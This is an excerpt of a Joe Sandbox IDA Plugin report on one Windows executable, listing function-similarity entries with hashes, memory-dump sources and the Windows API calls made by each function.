      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
      • String ID:
      • API String ID: 680105476-0
      • Opcode ID: 3234b2b5ac3a40deddea539940c0fe254cec77c5e42e079e7c739459eb3fc390
      • Instruction ID: e7c00eb009392e59bd641d999e2ba0fedb386ba8e3c285c0e76b1ad3dce72c8e
      • Opcode Fuzzy Hash: 3234b2b5ac3a40deddea539940c0fe254cec77c5e42e079e7c739459eb3fc390
      • Instruction Fuzzy Hash: A721A126A1C361C5EB15FB52A5002B9A260BB06BF1FA90B30DE7D07BC1DFBDE0518310
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo
      • String ID:
      • API String ID: 3215553584-0
      • Opcode ID: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
      • Instruction ID: a4ce3011ec68f766bca859775bdfc9acd7170208344a0feac72e95201cf68224
      • Opcode Fuzzy Hash: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
      • Instruction Fuzzy Hash: EE118479A1C663C2F712BB50A440639F294FB40785FD80134EA9D87695DFBEE400D760
      APIs
        • Part of subcall function 00007FF741EBF0A4: GetDlgItem.USER32 ref: 00007FF741EBF0E3
        • Part of subcall function 00007FF741EBF0A4: ShowWindow.USER32 ref: 00007FF741EBF109
        • Part of subcall function 00007FF741EBF0A4: SendMessageW.USER32 ref: 00007FF741EBF11E
        • Part of subcall function 00007FF741EBF0A4: SendMessageW.USER32 ref: 00007FF741EBF136
        • Part of subcall function 00007FF741EBF0A4: SendMessageW.USER32 ref: 00007FF741EBF157
        • Part of subcall function 00007FF741EBF0A4: SendMessageW.USER32 ref: 00007FF741EBF173
        • Part of subcall function 00007FF741EBF0A4: SendMessageW.USER32 ref: 00007FF741EBF1B6
        • Part of subcall function 00007FF741EBF0A4: SendMessageW.USER32 ref: 00007FF741EBF1D4
        • Part of subcall function 00007FF741EBF0A4: SendMessageW.USER32 ref: 00007FF741EBF1E8
        • Part of subcall function 00007FF741EBF0A4: SendMessageW.USER32 ref: 00007FF741EBF212
        • Part of subcall function 00007FF741EBF0A4: SendMessageW.USER32 ref: 00007FF741EBF22A
      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBFD03
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: MessageSend$ItemShowWindow_invalid_parameter_noinfo_noreturn
      • String ID:
      • API String ID: 1587882848-0
      • Opcode ID: 98356bcfc0f9eb0b54ad4562f3e8dfcdedede25df190cb48db04b7e24fbe0ebe
      • Instruction ID: 59a8e2f555a898add57e0dd23e81bde3c1fb3da2dc4bcd12d615a2c017e38940
      • Opcode Fuzzy Hash: 98356bcfc0f9eb0b54ad4562f3e8dfcdedede25df190cb48db04b7e24fbe0ebe
      • Instruction Fuzzy Hash: 5A01C86AA2C69681EB15F724D44537DA311FF89795F900331EAAC066D6EFACE0808614
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID:
      • API String ID: 3668304517-0
      • Opcode ID: dd833eb704b03c62a36fea145c0b0b4abee32047d89ef2e694e61e0216d7ee09
      • Instruction ID: b0318c1e17a942ddb89b05e2243a3d7c568d4b0f96351cf487c266ee695f809d
      • Opcode Fuzzy Hash: dd833eb704b03c62a36fea145c0b0b4abee32047d89ef2e694e61e0216d7ee09
      • Instruction Fuzzy Hash: 15010866E2C796C1EB12B728E44122DB361FB89791FC04331E6AD077A5EFACD0408704
      APIs
        • Part of subcall function 00007FF741EC1604: GetModuleHandleW.KERNEL32(?,?,?,00007FF741EC1573,?,?,?,00007FF741EC192A), ref: 00007FF741EC162B
      • DloadProtectSection.DELAYIMP ref: 00007FF741EC15C9
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: DloadHandleModuleProtectSection
      • String ID:
      • API String ID: 2883838935-0
      • Opcode ID: 908f49ac33541a8240f4269ada82e733cc5c0c647bda27ab8868a2cee9a60ef3
      • Instruction ID: 9e15cdb8b9463e4c422d4257708b63067bc27425c433e5a2607d4445c80262e1
      • Opcode Fuzzy Hash: 908f49ac33541a8240f4269ada82e733cc5c0c647bda27ab8868a2cee9a60ef3
      • Instruction Fuzzy Hash: 5411FA68F4C527D2FB63BB05A854B70A351BF2434BFD85034CA0D462A5FFADA49AC620
      APIs
        • Part of subcall function 00007FF741EA40BC: FindFirstFileW.KERNELBASE ref: 00007FF741EA410B
        • Part of subcall function 00007FF741EA40BC: FindFirstFileW.KERNEL32 ref: 00007FF741EA415E
        • Part of subcall function 00007FF741EA40BC: GetLastError.KERNEL32 ref: 00007FF741EA41AF
      • FindClose.KERNELBASE(?,?,00000000,00007FF741EB0811), ref: 00007FF741EA3EFD
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: Find$FileFirst$CloseErrorLast
      • String ID:
      • API String ID: 1464966427-0
      • Opcode ID: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
      • Instruction ID: c2a2a29946e3c052ea77a563b2bd9a4593ae2a439781aae3ddb0378698cb390e
      • Opcode Fuzzy Hash: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
      • Instruction Fuzzy Hash: E5F0F46A90C241C6EB21BFB0E2001B8B760AB05BF5F585334EA7D073C7CE68D4848760
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: File
      • String ID:
      • API String ID: 749574446-0
      • Opcode ID: 182d9e1e92039184aab4081fafd09b1cf385b4bd914a3c272b872952a66d9790
      • Instruction ID: 3a8e87eb18237afa489366e3a174fa20197506925904aff875c51c32ae091bd1
      • Opcode Fuzzy Hash: 182d9e1e92039184aab4081fafd09b1cf385b4bd914a3c272b872952a66d9790
      • Instruction Fuzzy Hash: 0EE08619B18526C1EF21BB26C8415345321BF48BC6B885030DE0C07761CF28C4818710
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: FileType
      • String ID:
      • API String ID: 3081899298-0
      • Opcode ID: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
      • Instruction ID: 19109f78b3e66ce9e769d3987f91befb3775b807d9b6072a570e71ff8d1d19c1
      • Opcode Fuzzy Hash: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
      • Instruction Fuzzy Hash: 7DD0C92AA0D462C2EA11B636985103C6360BF92776FE40720D63E916E2CA5D9496A221
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: AllocHeap
      • String ID:
      • API String ID: 4292702814-0
      • Opcode ID: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
      • Instruction ID: 6e674a6dbf2c8611888d5340fb3959df47dda023d7e87c7a0c1aa1003ad5648a
      • Opcode Fuzzy Hash: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
      • Instruction Fuzzy Hash: D6F03C58B0D227C5FF5A76699D113B4D2907F44B86F885430C94E46391FFACE581C230
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: AllocHeap
      • String ID:
      • API String ID: 4292702814-0
      • Opcode ID: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
      • Instruction ID: a19229960b0cd9890c7250a9186b6c9fe5c29bb1f6b5b0666098d57abfc0616d
      • Opcode Fuzzy Hash: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
      • Instruction Fuzzy Hash: F6F03A1CA0D267C4FF5676615C002B492917F887A2F8C1630D96E862C1EFDDE481E2B0
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: CloseHandle
      • String ID:
      • API String ID: 2962429428-0
      • Opcode ID: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
      • Instruction ID: e7ea5822f6e52738d605a019e04d9d73960d8852bb3da45becfa2c8d6d5cfe60
      • Opcode Fuzzy Hash: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
      • Instruction Fuzzy Hash: BBF08629A0C553D5FB25BB20D441279A7A1F724BBAF894334D73C051D5DE68D8958320
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastwcscpy$ControlCreateCurrentDeleteDeviceDirectoryProcessRemove
      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
      • API String ID: 2659423929-3508440684
      • Opcode ID: a370c127f7d6e68925e5e6f353acb8e453cb7dfd3c512b1f4417b00b85d8f9a3
      • Instruction ID: 118ae46ea60e719deb04aa32fae1483a37018460ac49c481b7d9bafaf59c6af2
      • Opcode Fuzzy Hash: a370c127f7d6e68925e5e6f353acb8e453cb7dfd3c512b1f4417b00b85d8f9a3
      • Instruction Fuzzy Hash: DC62E1A6F1C662C5FB01BB75D8442BDA321BB867A5F904231DA2D57AD6DFBCE084C310
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
      • String ID: %ls$%s: %s
      • API String ID: 2539828978-2259941744
      • Opcode ID: 945c123c5738f6103966ecffbffa27c83b3bf35cf43ea0aac1725ee40d95c140
      • Instruction ID: 67e46bb44fb11235547acfc625a957b57752e98ec057bc8e65c68af47edc5e53
      • Opcode Fuzzy Hash: 945c123c5738f6103966ecffbffa27c83b3bf35cf43ea0aac1725ee40d95c140
      • Instruction Fuzzy Hash: FFB28366A1C692C1EB12FB65D4541BEE361BFCA7D1F904336E69D036E6EEACE140C310
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfomemcpy_s
      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
      • API String ID: 1759834784-2761157908
      • Opcode ID: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
      • Instruction ID: 91f9a8a4563878046e28906b54d137bb698681de17c906ba567c1a9ccb07e482
      • Opcode Fuzzy Hash: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
      • Instruction Fuzzy Hash: FFB229BAE0C1A3CAE726BE24C5406FDA7A1FB44389F885135DA2A57B85DF7CE504C710
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
      • String ID: rtmp
      • API String ID: 3587137053-870060881
      • Opcode ID: d56d65f6e3d64a94564ebbd928e94f8f211499ec6bfe88100997fab12f3fd8ee
      • Instruction ID: 613f06515f0e59989389e90f8cc9f1223f60811e4dc62d92c7b6ef93388144a9
      • Opcode Fuzzy Hash: d56d65f6e3d64a94564ebbd928e94f8f211499ec6bfe88100997fab12f3fd8ee
      • Instruction Fuzzy Hash: EAF1F226B1CA92C1EB01FB65E8801FDA7A1FB957D5F901132EA4D43AA9DFBCD484C350
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
      • String ID:
      • API String ID: 1693479884-0
      • Opcode ID: 35b10314ce3b8e4c64707b679fc70269f3b9094245ec8e91ba41ccecbc270bb7
      • Instruction ID: 559ce4cdd7939c9d52e4692524cc78b3db823c4558b871afd50eb6cef0f1073c
      • Opcode Fuzzy Hash: 35b10314ce3b8e4c64707b679fc70269f3b9094245ec8e91ba41ccecbc270bb7
      • Instruction Fuzzy Hash: 96A1AF66F18A62C4FF05BB7998441BCA361BF49BE5B948235DE2D17BC9DEBCE041C210
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
      • String ID:
      • API String ID: 3140674995-0
      • Opcode ID: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
      • Instruction ID: 5c1d4e24b7d1903b559fba90d17d74d9095e08f838f49dea7ae2c3284842485a
      • Opcode Fuzzy Hash: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
      • Instruction Fuzzy Hash: D8318E76608B92CAEB61BF60E8507EDB370FB84745F844039DA4D43A98EF78D548C720
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
      • String ID:
      • API String ID: 1239891234-0
      • Opcode ID: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
      • Instruction ID: 8af3a9e5017f66d6b08098b0efbbc7d903316f474acbbfdcba98a29f9fbbd381
      • Opcode Fuzzy Hash: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
      • Instruction Fuzzy Hash: 5331923A608B91C6DB21BF25EC406AEB3A0FB88755F940135EA9D43B59EF7CC145C710
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID:
      • API String ID: 3668304517-0
      • Opcode ID: c264b490cac148f64dd39c131735208f64494c1dc21ecf378d5d3bcbd534f5da
      • Instruction ID: d2cce56503666ca2717a721865843380f95c4dd8eb3cbbbb6242b367eec8a617
      • Opcode Fuzzy Hash: c264b490cac148f64dd39c131735208f64494c1dc21ecf378d5d3bcbd534f5da
      • Instruction Fuzzy Hash: 87B1E56AB287A6D5EB12BB25D8402EDA361FF86795F800131EA5C07BD5EFBCD540C310
      APIs
      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF741ECFAC4
